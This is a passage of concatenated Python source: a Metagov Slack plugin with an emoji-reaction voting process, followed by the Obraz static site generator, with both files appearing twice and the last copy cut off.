["hearts", "flowers", "numbers"], "description": "emoji family to use for choice selection. ignored for 'boolean' poll type", }, }, "required": ["title", "poll_type"], } class Meta: proxy = True def start(self, parameters) -> None: text = construct_message_header(parameters["title"], parameters.get("details")) self.state.set("message_header", text) poll_type = parameters["poll_type"] options = [Bool.YES, Bool.NO] if poll_type == "boolean" else parameters["options"] if options is None: raise ValidationError("Options are required for non-boolean votes") maybe_channel = parameters.get("channel") maybe_users = parameters.get("users") if maybe_channel is None and (maybe_users is None or len(maybe_users) == 0): raise ValidationError("users or channel are required") if poll_type == "boolean": option_emoji_map = {"+1": Bool.YES, "-1": Bool.NO} else: family = parameters.get("emoji_family", "numbers") emojis = EMOJI_MAP[family] if len(emojis) < len(options): raise PluginErrorInternal("There are more voting options than possible emojis") if family != "numbers": random.shuffle(emojis) emojis = emojis[: len(options)] option_emoji_map = dict(zip(emojis, options)) for (k, v) in option_emoji_map.items(): text += f"\n> :{k}: {v}" self.state.set("option_emoji_map", option_emoji_map) response = self.plugin_inst.post_message({"channel": maybe_channel, "users": maybe_users, "text": text}) ts = response["ts"] channel = response["channel"] permalink_resp = self.plugin_inst.method( { "method_name": "chat.getPermalink", "channel": channel, "message_ts": ts, } ) # Add 1 initial reaction for each emoji type for emoji in option_emoji_map.keys(): self.plugin_inst.method( {"method_name": "reactions.add", "channel": channel, "timestamp": ts, "name": emoji} ) self.state.set("poll_type", parameters["poll_type"]) self.outcome = { "url": permalink_resp["permalink"], "channel": channel, "message_ts": ts, "votes": dict([(k, {"users": [], "count": 0}) for k in options]), } self.status = ProcessStatus.PENDING.value self.save() def receive_webhook(self, request): json_data = json.loads(request.body) data = json_data["event"] evt_type = data["type"] if not evt_type.startswith("reaction_"): return ts = data["item"]["ts"] if ts != self.outcome["message_ts"]: return reaction = normalize_reaction(data["reaction"]) option_emoji_map = self.state.get("option_emoji_map") if reaction not in option_emoji_map: return option = option_emoji_map[reaction] logger.debug(f"Processing reaction '{reaction}' as a vote for '{option}'") # Get the voting message post and update all the vote counts based on the emojis currently present ts = self.outcome["message_ts"] response = self.plugin_inst.method( { "method_name": "conversations.history", "channel": self.outcome["channel"], "latest": ts, "oldest": ts, "inclusive": True, "limit": 1, } ) self.update_outcome_from_reaction_list(response["messages"][0].get("reactions", [])) def close(self): # Edit content of the post to mark it as "closed." option_emoji_map = self.state.get("option_emoji_map") text = self.state.get("message_header") if self.state.get("poll_type") == "boolean": yes = self.outcome["votes"][Bool.YES]["count"] no = self.outcome["votes"][Bool.NO]["count"] text += f"\nFinal vote count: {yes} for and {no} against." else: for (k, v) in option_emoji_map.items(): count = self.outcome["votes"][v]["count"] text += f"\n> :{k}: {v} ({count})" self.plugin_inst.method( { "method_name": "chat.update", "channel": self.outcome["channel"], "ts": self.outcome["message_ts"], "text": text, } ) self.status = ProcessStatus.COMPLETED.value self.save() def update_outcome_from_reaction_list(self, reaction_list): self.outcome["votes"] = reactions_to_dict( reaction_list, self.state.get("option_emoji_map"), excluded_users=[self.plugin_inst.config["bot_user_id"]] ) self.save() def construct_message_header(title, details=None): text = f"*{title}*\n" if details: text += f"{details}\n" return text def reactions_to_dict(reaction_list, emoji_to_option, excluded_users=[]): """Convert list of reactions from Slack API into a dictionary of option votes""" votes = {} for r in reaction_list: emoji = normalize_reaction(r.pop("name")) option = emoji_to_option.get(emoji) if not option: continue # remove excluded users from list of reactions user_list = set(r["users"]) user_list.difference_update(set(excluded_users)) user_list = list(user_list) user_list.sort() if votes.get(option): # we already have some users listed (because of normalized reactions) uniq_users = list(set(votes[option]["users"] + user_list)) uniq_users.sort() votes[option] = {"users": uniq_users, "count": len(uniq_users)} else: votes[option] = {"users": user_list, "count": len(user_list)} # add zeros for options that don't have any reactions for v in emoji_to_option.values(): if votes.get(v) is None: votes[v] = {"users": [], "count": 0} return votes def normalize_reaction(reaction: str): if reaction.startswith("+1::skin-tone-"): return "+1" if reaction.startswith("-1::skin-tone-"): return "-1" return reaction
import json import logging import random from rest_framework.exceptions import ValidationError import metagov.core.plugin_decorators as Registry import requests from metagov.core.errors import PluginErrorInternal from metagov.core.models import GovernanceProcess, Plugin, ProcessStatus, AuthType logger = logging.getLogger(__name__) @Registry.plugin class Slack(Plugin): name = "slack" auth_type = AuthType.OAUTH config_schema = { "type": "object", "properties": { # these are set automatically if using the oauth flow "team_id": {"description": "Slack Team ID", "type": "string"}, "team_name": {"description": "Slack Team Name", "type": "string"}, "bot_token": {"description": "Bot Token", "type": "string"}, "bot_user_id": {"description": "Bot User ID", "type": "string"}, }, } class Meta: proxy = True def receive_event(self, request): """ Passes on ALL received events to the driver """ json_data = json.loads(request.body) if json_data["type"] != "event_callback" or json_data["team_id"] != self.config["team_id"]: return # Data types: https://api.slack.com/apis/connections/events-api#the-events-api__receiving-events__events-dispatched-as-json # Event list: https://api.slack.com/events event = json_data["event"] # pop off 'type' and 'user' since they are represented separately in metagov-style event event_type = event.pop("type") maybe_user = event.pop("user", None) logger.debug(f"Received event {event_type}") initiator = { "user_id": maybe_user, "provider": "slack", "is_metagov_bot": maybe_user and maybe_user == self.config["bot_user_id"], } self.send_event_to_driver(event_type=event_type, initiator=initiator, data=event) @Registry.action( slug="post-message", input_schema={ "type": "object", "properties": {"users": {"type": "array", "items": {"type": "string"}}, "channel": {"type": "string"}}, }, description="Post message either in a channel, direct message, or multi-person message. Supports all params accepted by Slack method chat.postMessage.", ) def post_message(self, parameters): bot_token = self.config["bot_token"] data = {"token": bot_token, **parameters} # note: parameters may include a token override! if not parameters.get("users") and not parameters.get("channel"): raise ValidationError("users or channel are required") if parameters.get("users") and not parameters.get("channel"): # open a conversation for DM or multi person message users = ",".join(parameters.get("users")) params = {"token": bot_token, "users": users} response = self.slack_request("POST", "conversations.open", data=params) channel = response["channel"]["id"] logger.debug(f"Opened conversation {channel} with users {users}") data["channel"] = channel return self.slack_request("POST", "chat.postMessage", data=data) def join_conversation(self, channel): return self.slack_request( "POST", "conversations.join", data={"token": self.config["bot_token"], "channel": channel} ) @Registry.action( slug="method", input_schema={ "type": "object", "properties": {"method_name": {"type": "string"}}, "required": ["method_name"], }, description="Perform any Slack method (provided sufficient scopes)", ) def method(self, parameters): """ Action for performing any method in https://api.slack.com/methods See also: https://api.slack.com/web#basics Example usage: curl -iX POST "https://metagov.policykit.org/api/internal/action/slack.method" -H "accept: application/json" -H "X-Metagov-Community: slack-tmq3pkxt9" -d '{"parameters":{"method_name":"chat.postMessage", "channel":"C0177HZTV7X", "text":"hello world"}}' curl -iX POST "https://metagov.policykit.org/api/internal/action/slack.method" -H "accept: application/json" -H "X-Metagov-Community: slack-tmq3pkxt9" -d '{"parameters":{"channel":"C0177HZTV7X","method":"pins.add","timestamp":"1622820212.008000"}}' curl -iX POST "https://metagov.policykit.org/api/internal/action/slack.method" -H "accept: application/json" -H "X-Metagov-Community: slack-tmq3pkxt9" -d '{"parameters":{"channel":"C0177HZTV7X","method":"pins.remove","timestamp":"1622820212.008000"}}' """ method = parameters.pop("method_name") # note: parameters may include a token override! data = {"token": self.config["bot_token"], **parameters} try: return self.slack_request("POST", method, data=data) except PluginErrorInternal as e: # TODO: make this configurable, might not be desirable in all cases. Bot must be in the channel for `reaction.add` method to work (and others). if e.detail == "not_in_channel" and data.get("channel"): logger.warn(f"Failed with not_in_channel. Adding bot to channel {data['channel']} and retrying...") self.join_conversation(data["channel"]) return self.slack_request("POST", method, data=data) else: raise def slack_request(self, method, route, json=None, data=None): url = f"https://slack.com/api/{route}" logger.debug(f"{method} {url}") resp = requests.request(method, url, json=json, data=data) if not resp.ok: logger.error(f"{resp.status_code} {resp.reason}") logger.error(resp.request.body) raise PluginErrorInternal(resp.text) if resp.content: data = resp.json() is_ok = data.pop("ok") if not is_ok: # logger.debug(f"X-OAuth-Scopes: {resp.headers.get('X-OAuth-Scopes')}") # logger.debug(f"X-Accepted-OAuth-Scopes: {resp.headers.get('X-Accepted-OAuth-Scopes')}") # logger.debug(data["error"]) raise PluginErrorInternal(data["error"]) return data return {} EMOJI_MAP = { "numbers": [ "one", "two", "three", "four", "five", "six", "seven", "eight", "nine", "keycap_ten", ], "flowers": [ "tulip", "sunflower", "cherry_blossom", "rose", "wilted_flower", "bouquet", "hibiscus", "blossom", ], "hearts": [ "blue_heart", "purple_heart", "heart", "green_heart", "sparkling_heart", "orange_heart", "green_heart", ], } class Bool: YES = "yes" NO = "no" @Registry.governance_process class SlackEmojiVote(GovernanceProcess): # TODO(enhancement): let the caller define the emoji for each option # TODO(enhancement): add suport for "closing_at" time # TODO(enhancement): support single-choice and multiple-choice # TODO(enhancement): only allow one vote per person on boolean votes name = "emoji-vote" plugin_name = "slack" input_schema = { "type": "object", "properties": { "title": {"type": "string"}, "options": { "type": "array", "items": {"type": "string"}, "description": "options to use for choice selection. ignored for 'boolean' poll type", }, "details": {"type": "string"}, "poll_type": {"type": "string", "enum": ["boolean", "choice"]}, "channel": { "type": "string", "description": "channel to post the vote in", }, "users": { "type": "array", "items": {"type": "string"}, "description": "users to participate in vote in a multi-person message thread. ignored if channel is provided.", }, "emoji_family": { "type": "string", "enum": ["hearts", "flowers", "numbers"], "description": "emoji family to use for choice selection. ignored for 'boolean' poll type", }, }, "required": ["title", "poll_type"], } class Meta: proxy = True def start(self, parameters) -> None: text = construct_message_header(parameters["title"], parameters.get("details")) self.state.set("message_header", text) poll_type = parameters["poll_type"] options = [Bool.YES, Bool.NO] if poll_type == "boolean" else parameters["options"] if options is None: raise ValidationError("Options are required for non-boolean votes") maybe_channel = parameters.get("channel") maybe_users = parameters.get("users") if maybe_channel is None and (maybe_users is None or len(maybe_users) == 0): raise ValidationError("users or channel are required") if poll_type == "boolean": option_emoji_map = {"+1": Bool.YES, "-1": Bool.NO} else: family = parameters.get("emoji_family", "numbers") emojis = EMOJI_MAP[family] if len(emojis) < len(options): raise PluginErrorInternal("There are more voting options than possible emojis") if family != "numbers": random.shuffle(emojis) emojis = emojis[: len(options)] option_emoji_map = dict(zip(emojis, options)) for (k, v) in option_emoji_map.items(): text += f"\n> :{k}: {v}" self.state.set("option_emoji_map", option_emoji_map) response = self.plugin_inst.post_message({"channel": maybe_channel, "users": maybe_users, "text": text}) ts = response["ts"] channel = response["channel"] permalink_resp = self.plugin_inst.method( { "method_name": "chat.getPermalink", "channel": channel, "message_ts": ts, } ) # Add 1 initial reaction for each emoji type for emoji in option_emoji_map.keys(): self.plugin_inst.method( {"method_name": "reactions.add", "channel": channel, "timestamp": ts, "name": emoji} ) self.state.set("poll_type", parameters["poll_type"]) self.outcome = { "url": permalink_resp["permalink"], "channel": channel, "message_ts": ts, "votes": dict([(k, {"users": [], "count": 0}) for k in options]), } self.status = ProcessStatus.PENDING.value self.save() def receive_webhook(self, request): json_data = json.loads(request.body) data = json_data["event"] evt_type = data["type"] if not evt_type.startswith("reaction_"): return ts = data["item"]["ts"] if ts != self.outcome["message_ts"]: return reaction = normalize_reaction(data["reaction"]) option_emoji_map = self.state.get("option_emoji_map") if reaction not in option_emoji_map: return option = option_emoji_map[reaction] logger.debug(f"Processing reaction '{reaction}' as a vote for '{option}'") # Get the voting message post and update all the vote counts based on the emojis currently present ts = self.outcome["message_ts"] response = self.plugin_inst.method( { "method_name": "conversations.history", "channel": self.outcome["channel"], "latest": ts, "oldest": ts, "inclusive": True, "limit": 1, } ) self.update_outcome_from_reaction_list(response["messages"][0].get("reactions", [])) def close(self): # Edit content of the post to mark it as "closed." option_emoji_map = self.state.get("option_emoji_map") text = self.state.get("message_header") if self.state.get("poll_type") == "boolean": yes = self.outcome["votes"][Bool.YES]["count"] no = self.outcome["votes"][Bool.NO]["count"] text += f"\nFinal vote count: {yes} for and {no} against." else: for (k, v) in option_emoji_map.items(): count = self.outcome["votes"][v]["count"] text += f"\n> :{k}: {v} ({count})" self.plugin_inst.method( { "method_name": "chat.update", "channel": self.outcome["channel"], "ts": self.outcome["message_ts"], "text": text, } ) self.status = ProcessStatus.COMPLETED.value self.save() def update_outcome_from_reaction_list(self, reaction_list): self.outcome["votes"] = reactions_to_dict( reaction_list, self.state.get("option_emoji_map"), excluded_users=[self.plugin_inst.config["bot_user_id"]] ) self.save() def construct_message_header(title, details=None): text = f"*{title}*\n" if details: text += f"{details}\n" return text def reactions_to_dict(reaction_list, emoji_to_option, excluded_users=[]): """Convert list of reactions from Slack API into a dictionary of option votes""" votes = {} for r in reaction_list: emoji = normalize_reaction(r.pop("name")) option = emoji_to_option.get(emoji) if not option: continue # remove excluded users from list of reactions user_list = set(r["users"]) user_list.difference_update(set(excluded_users)) user_list = list(user_list) user_list.sort() if votes.get(option): # we already have some users listed (because of normalized reactions) uniq_users = list(set(votes[option]["users"] + user_list)) uniq_users.sort() votes[option] = {"users": uniq_users, "count": len(uniq_users)} else: votes[option] = {"users": user_list, "count": len(user_list)} # add zeros for options that don't have any reactions for v in emoji_to_option.values(): if votes.get(v) is None: votes[v] = {"users": [], "count": 0} return votes def normalize_reaction(reaction: str): if reaction.startswith("+1::skin-tone-"): return "+1" if reaction.startswith("-1::skin-tone-"): return "-1" return reaction
# -*- coding: utf-8 -*- # Copyright (c) 2012-2022 Andrey Vlasovskikh # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. """Static blog-aware site generator in Python mostly compatible with Jekyll. Usage: obraz (build | serve | new PATH) [options] obraz -h|--help Commands: build Build your site. serve Serve your site locally. new Create a new Obraz site scaffold in PATH. Options: -s --source=DIR Source directory. -d --destination=DIR Destination directory. --force Force overwriting the destination directory. --safe Disable custom plugins. -w --watch Watch for changes and rebuild. -D --drafts Render posts in the _drafts folder. -H --host=HOSTNAME Listen at the given hostname. -P --port=PORT Listen at the given port. -b --baseurl=URL Serve the website from the given base URL. -q --quiet Be quiet. -t --trace Display traceback when an error occurs. -v --version Show version. -h --help Show help message. For documentation see <https://obraz.pirx.ru/>. """ import contextlib import os import re import shutil import sys import traceback from datetime import datetime from glob import glob from http.server import SimpleHTTPRequestHandler, HTTPServer from io import BytesIO from threading import Thread from time import sleep from typing import ( BinaryIO, Any, Callable, Iterable, Sequence, TypeVar, Optional, TypedDict, Union, cast, ) from urllib.request import pathname2url, url2pathname import yaml from docopt import docopt from jinja2 import Environment, FileSystemLoader from markdown import markdown __all__ = [ "file_filter", "generator", "loader", "processor", "template_filter", "template_renderer", ] PAGE_ENCODING = "UTF-8" class ConfigBase(TypedDict): source: str destination: str include: list[str] exclude: list[str] exclude_patterns: list[str] full_build_patterns: list[str] host: str port: str baseurl: str permalink: str class Config(ConfigBase, total=False): time: datetime drafts: bool force: bool trace: bool class File(TypedDict): url: str path: str class TemplateBase(TypedDict): content: str class Template(TemplateBase, total=False): layout: str class PageBase(Template): url: str class Page(PageBase, total=False): path: str published: bool raw_content: bool class PostBase(Page): date: datetime id: str class Post(PostBase, total=False): next: "Post" # type: ignore previous: "Post" # type: ignore tags: list[str] class SiteContents(TypedDict, total=False): files: list[File] pages: list[Page] posts: list[Post] tags: dict[str, list[Post]] class Site(SiteContents, Config): pass DEFAULT_CONFIG: ConfigBase = { "source": "./", "destination": "./_site", "include": [".htaccess"], "exclude": [], "exclude_patterns": [r"^[\.#].*", r".*~$", r".*\.sw[op]$"], "full_build_patterns": [ r"_layouts", r"_includes", ], "host": "localhost", "port": "8000", "baseurl": "", "permalink": "/{year}/{month}/{day}/{title}.html", } _quiet = False _loaders: list[Callable[[str, Config], Optional[SiteContents]]] = [] _processors: list[Callable[[Site], None]] = [] _render_string = lambda s, _context, _config: s _file_filters: dict[str, Callable[[str, Config], str]] = {} _template_filters: dict[str, Callable[[str, Config], str]] = {} _T = TypeVar("_T") def file_filter(extensions: Iterable[str]) -> Any: """Register a page content filter for file extensions.""" def wrapper(f: Callable[[str, Config], str]) -> Callable[[str, Config], str]: for ext in extensions: _file_filters[ext] = f return f return wrapper def template_filter(name: str) -> Any: """Register a template filter.""" def wrapper(f: Callable[[str, Config], str]) -> Callable[[str, Config], str]: _template_filters[name] = f return f return wrapper def template_renderer(f: Callable[[str, dict[str, Any], Config], str]) -> Any: """Set a custom template renderer.""" global _render_string _render_string = f return f def loader(f: Callable[[str, Config], Optional[SiteContents]]) -> Any: """Register a site source content loader.""" _loaders.insert(0, f) return f def processor(f: Callable[[Site], None]) -> Any: """Register a site content processor.""" _processors.insert(0, f) return f def generator(f: Callable[[Site], None]) -> Any: """Register a destination files generator for the site.""" _processors.append(f) return f def fallback_loader(f: Callable[[str, Config], Optional[SiteContents]]) -> Any: _loaders.append(f) return f def load_yaml_mapping(path: str) -> dict: try: with open(path, "rb") as fd: mapping = yaml.safe_load(fd) return mapping if mapping else {} except FileNotFoundError: return {} def merge(x1: _T, x2: _T) -> _T: if isinstance(x1, dict) and isinstance(x2, dict): res_dict = x1.copy() for k, v in x2.items(): if k in res_dict: res_dict[k] = merge(res_dict[k], v) else: res_dict[k] = v return cast(_T, res_dict) elif isinstance(x1, list) and isinstance(x2, list): res_list = x1.copy() res_list.extend(x2) return cast(_T, res_list) elif x1 == x2: return x1 else: raise ValueError(f"Cannot merge '{x1!r}' and '{x2!r}'") def all_source_files(source: str, destination: str) -> Iterable[str]: dst_base, dst_name = os.path.split(os.path.realpath(destination)) for source, dirs, files in os.walk(source): if os.path.realpath(source) == dst_base and dst_name in dirs: dirs.remove(dst_name) for filename in files: yield os.path.join(source, filename) def changed_files( source: str, destination: str, config: Config, poll_interval: int = 1 ) -> Iterable[list[str]]: times: dict[str, float] = {} while True: changed = [] for path in all_source_files(source, destination): rel_path = os.path.relpath(path, source) if not is_file_visible(rel_path, config): continue new = os.stat(path).st_mtime old = times.get(path) if not old or new > old: times[path] = new changed.append(path) if changed: yield changed sleep(poll_interval) def is_file_visible(path: str, config: Config) -> bool: """Check file name visibility according to site settings.""" parts = path.split(os.path.sep) exclude = config.get("exclude", []) exclude_patterns = config.get("exclude_patterns", []) if path in config.get("include", []): return True elif any(re.match(pattern, part) for pattern in exclude_patterns for part in parts): return False elif any(path.startswith(s) for s in exclude): return False else: return True def is_underscored(path: str) -> bool: parts = path.split(os.path.sep) return any(part.startswith("_") for part in parts) def path2url(path: str) -> str: m = re.match(r"(.*)[/\\]index.html?$", path) if m: path = m.group(1) + os.path.sep path = os.path.sep + path return pathname2url(path) def url2path(url: str) -> str: if url.endswith("/"): url += "index.html" return url2pathname(url).lstrip(os.path.sep) def make_dirs(path: str) -> None: with contextlib.suppress(FileExistsError): os.makedirs(path) def remove(path: str) -> None: with contextlib.suppress(FileExistsError): if os.path.isdir(path): shutil.rmtree(path) else: os.remove(path) def info(message: str) -> None: if not _quiet: log(message) def exception(e: BaseException, trace: bool) -> None: if trace: traceback.print_tb(e.__traceback__) log(f"Error: {e}") def log(message: str) -> None: sys.stderr.write(f"{message}\n") sys.stderr.flush() def progress(msg: str, xs: Sequence[_T]) -> Iterable[_T]: if _quiet: for x in xs: yield x else: size = len(xs) for i, x in enumerate(xs, 1): yield x s = f"{msg}: {int(i * 100 / size)}% ({i}/{size})" sys.stderr.write("\r" + s) sys.stderr.write("\n") def file_suffix(path: str) -> str: _, ext = os.path.splitext(path) return ext def object_name(f: Any) -> str: if f.__doc__: lines = f.__doc__.splitlines() for line in lines: line = line.strip() if line: return line.rstrip(".") return f.__name__ @template_filter("markdownify") @file_filter([".md", ".markdown"]) def markdown_filter(s: str, config: Config) -> str: return markdown(s) @fallback_loader def load_file(path: str, config: Config) -> Optional[SiteContents]: if not is_file_visible(path, config) or is_underscored(path): return None file: File = {"url": path2url(path), "path": path} return { "files": [file], } @template_renderer def jinja2_render_string(string: str, context: dict[str, Any], config: Config) -> str: includes = os.path.join(config["source"], "_includes") env = Environment(loader=FileSystemLoader(includes)) for name, f in _template_filters.items(): env.filters[name] = lambda s: f(s, config) t = env.from_string(string) return t.render(**context) def read_template(path: str) -> Optional[Template]: with open(path, "rb") as fd: if fd.read(3) != b"---": return None lines = [] while True: line = fd.readline() if re.match(b"^---\r?\n", line): break elif line == b"": return None lines.append(line) front_matter = BytesIO(b"".join(lines)) front_matter.name = path page = yaml.safe_load(front_matter) if not page: page = {} content = fd.read().decode(PAGE_ENCODING) page["content"] = content return page @loader def load_page(path: str, config: Config) -> Optional[SiteContents]: if not is_file_visible(path, config) or is_underscored(path): return None name, suffix = os.path.splitext(path) if suffix in _file_filters: dst = f"{name}.html" else: dst = path page = cast(Page, read_template(os.path.join(config["source"], path))) if not page: return None page["url"] = path2url(dst) page["path"] = path return {"pages": [page]} def read_post( path: str, date: datetime, title: str, config: Config ) -> Optional[SiteContents]: post = cast(Post, read_template(os.path.join(config["source"], path))) if not post: return None if "date" in post: date = post["date"] url_vars = { "year": f"{date.year:04}", "month": f"{date.month:02}", "day": f"{date.day:02}", "title": title, } post["url"] = pathname2url(config["permalink"].format(**url_vars)) post["path"] = path if "date" not in post: date_str = "{year}-{month}-{day}".format(**url_vars) post["date"] = datetime.strptime(date_str, "%Y-%m-%d") post["id"] = "/{year}/{month}/{day}/{title}".format(**url_vars) return { "posts": [post], "tags": dict((tag, [post]) for tag in post.get("tags", [])), } @loader def load_post(path: str, config: Config) -> Optional[SiteContents]: post_re = re.compile( r"(?P<year>\d{4})-(?P<month>\d{2})-(?P<day>\d{2})-" r"(?P<title>.+)" ) parts = path.split(os.path.sep) if "_posts" not in parts: return None if not is_file_visible(path, config): return None name, _ = os.path.splitext(os.path.basename(path)) m = post_re.match(name) if not m: return None date = datetime.strptime("{year}-{month}-{day}".format(**m.groupdict()), "%Y-%m-%d") return read_post(path, date, m.group("title"), config) @loader def load_draft(path: str, config: Config) -> Optional[SiteContents]: if not config.get("drafts"): return None if "_drafts" not in path.split(os.path.sep): return None if not is_file_visible(path, config): return None title, _ = os.path.splitext(os.path.basename(path)) return read_post(path, config.get("time", datetime.utcnow()), title, config) def render_layout(content: str, template: Template, site: Site) -> str: name = template.get("layout", "nil") if name == "nil": return content layout_file = os.path.join(site["source"], "_layouts", f"{name}.html") layout = read_template(layout_file) if not layout: raise Exception(f"Cannot load template: '{layout_file}'") layout_copy = cast(dict, layout.copy()) page_copy = cast(dict, template.copy()) page_copy.pop("layout", None) page_copy.pop("content", None) layout_copy.update(page_copy) layout = cast(Template, layout_copy) context = { "site": site, "page": layout, "content": content, } content = _render_string(layout["content"], context, site) return render_layout(content, layout, site) def render_page(page: Page, site: Site) -> str: context = { "site": site, "page": page, } content = page["content"] if not page.get("raw_content", False): content = _render_string(content, context, site) f = _file_filters.get(file_suffix(page.get("path", ""))) if f: content = f(content, site) page["content"] = content return render_layout(content, page, site) @processor def process_posts(site: Site) -> None: """Sort and interlink posts.""" posts: list[Post] = site.setdefault("posts", []) posts.sort(key=lambda p: p["date"], reverse=True) n = len(posts) for i, post in enumerate(posts): if i < n - 1: post["next"] = posts[i + 1] if i > 0: post["previous"] = posts[i - 1] def generate_page(page: Page, site: Site) -> None: if not page.get("published", True): return url = page["url"] dst = os.path.join(site["destination"], url2path(url)) make_dirs(os.path.dirname(dst)) with open(dst, "wb") as fd: fd.truncate() try: rendered = render_page(page, site) except Exception as e: raise Exception(f"Cannot render '{page.get("path")}': {e}") fd.write(rendered.encode(PAGE_ENCODING)) @generator def generate_pages(site: Site) -> None: """Generate pages with YAML front matter.""" posts = cast(list[Page], site.get("posts", [])) pages = site.get("pages", []) for page in progress("Generating pages", posts + pages): generate_page(page, site) @generator def generate_files(site: Site) -> None: """Copy static files.""" for file_dict in site.get("files", []): src = os.path.join(site["source"], file_dict["path"]) dst = os.path.join(site["destination"], url2path(file_dict["url"])) make_dirs(os.path.dirname(dst)) shutil.copy(src, dst) def load_plugins(source: str) -> None: plugins = sorted(glob(os.path.join(source, "_plugins", "*.py"))) n = 0 for plugin in plugins: with open(plugin, "rb") as fd: code = fd.read() exec(compile(code, plugin, "exec"), {}) n += 1 if n > 0: info(f"Loaded {n} plugins") def build(config: Config) -> None: site = load_site(config) generate_site(site) def build_delta(paths: Iterable[str], config: Config) -> None: site = load_site_files(paths, config) generate_site(site, clean=False) def load_site_files(paths: Iterable[str], config: Config) -> Site: source = config["source"] info("Loading source files...") site = cast(SiteContents, config.copy()) n = 0 for path in paths: rel_path = os.path.relpath(path, source) for f in _loaders: data = f(rel_path, config) if data: n += 1 site = merge(site, data) break info(f"Loaded {n} files") return cast(Site, site) def load_site(config: Config) -> Site: paths = all_source_files(config["source"], config["destination"]) return load_site_files(paths, config) def generate_site(site: Site, clean: bool = True) -> None: destination = site["destination"] marker = os.path.join(destination, ".obraz_destination") write_denied = os.path.exists(destination) and not os.path.exists(marker) if write_denied and not site.get("force"): raise Exception( f"Use --force to overwrite the contents " f"of '{destination}' not marked as destination " f"directory yet" ) make_dirs(destination) if clean: for name in os.listdir(destination): remove(os.path.join(destination, name)) with open(marker, "wb"): pass for f in _processors: msg = object_name(f) info(f"{msg}...") f(site) info("Site generated successfully") def make_server(config: Config) -> HTTPServer: host = config["host"] port = int(config["port"]) baseurl = config["baseurl"] class Handler(SimpleHTTPRequestHandler): def send_head(self) -> Union[BytesIO, BinaryIO, None]: if not self.path.startswith(baseurl): self.send_error(404, "File not found") return None self.path = self.path[len(baseurl) :] if not self.path.startswith("/"): self.path = "/" + self.path return SimpleHTTPRequestHandler.send_head(self) return HTTPServer((host, port), Handler) def serve(config: Config) -> None: build(config) server = make_server(config) os.chdir(config["destination"]) log_serving(config) server.serve_forever() def watch(config: Config) -> None: source = os.path.abspath(config["source"]) destination = os.path.abspath(config["destination"]) initial_dir = os.getcwd() serving = False server = make_server(config) for changed in changed_files(source, destination, config): if serving: info(f"Changed {len(changed)} files, regenerating...") server.shutdown() os.chdir(initial_dir) try: if full_build_required(changed, config) or not serving: build(config) else: build_delta(changed, config) except KeyboardInterrupt: raise except Exception as e: exception(e, bool(config.get("trace"))) os.chdir(destination) log_serving(config) thread = Thread(target=server.serve_forever) thread.daemon = True thread.start() if not serving: serving = True def log_serving(config: Config) -> None: url = "http://{host}:{port}{baseurl}".format(**config) if not url.endswith("/"): url += "/" info(f"Serving at {url}") def full_build_required(changed_paths: Iterable[str], config: Config) -> bool: patterns = config.get("full_build_patterns", []) source = os.path.abspath(config["source"]) for path in changed_paths: parts = os.path.relpath(path, source).split(os.path.sep) if any(re.match(pattern, part) for pattern in patterns for part in parts): return True return False def new_site(path: str) -> None: if os.path.exists(path) and os.listdir(path): raise Exception(f"Path '{path}' exists and is not empty") dev_source = os.path.join(os.path.dirname(__file__), "scaffold") if os.path.exists(dev_source): source = dev_source else: source = os.path.join(sys.prefix, "obraz/scaffold") shutil.copytree(source, path) info(f"New Obraz site installed in '{path}'") def obraz(argv: list[str]) -> None: opts = docopt(__doc__ or "", argv=argv, version="0.9.5") global _quiet _quiet = opts["--quiet"] try: if opts["new"]: new_site(opts["PATH"]) return copy = cast(dict, DEFAULT_CONFIG.copy()) source = opts["--source"] if opts["--source"] else "./" config_file = os.path.join(source, "_config.yml") copy.update(load_yaml_mapping(config_file)) copy["time"] = datetime.utcnow() for k, v in opts.items(): if k.startswith("--") and v: copy[k[2:]] = v config = cast(Config, copy) info(f'Source: {os.path.abspath(config['source'])}') info(f'Destination: {os.path.abspath(config['destination'])}') if not config.get("safe"): load_plugins(source) if opts["build"]: build(config) elif opts["serve"]: if opts["--watch"]: watch(config) else: serve(config) except KeyboardInterrupt: info("Interrupted") except BaseException as e: exception(e, opts["--trace"]) raise def main() -> None: sys.modules["obraz"] = sys.modules[__name__] try: obraz(sys.argv[1:]) except Exception: sys.exit(1) if __name__ == "__main__": main()
# -*- coding: utf-8 -*- # Copyright (c) 2012-2022 Andrey Vlasovskikh # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. """Static blog-aware site generator in Python mostly compatible with Jekyll. Usage: obraz (build | serve | new PATH) [options] obraz -h|--help Commands: build Build your site. serve Serve your site locally. new Create a new Obraz site scaffold in PATH. Options: -s --source=DIR Source directory. -d --destination=DIR Destination directory. --force Force overwriting the destination directory. --safe Disable custom plugins. -w --watch Watch for changes and 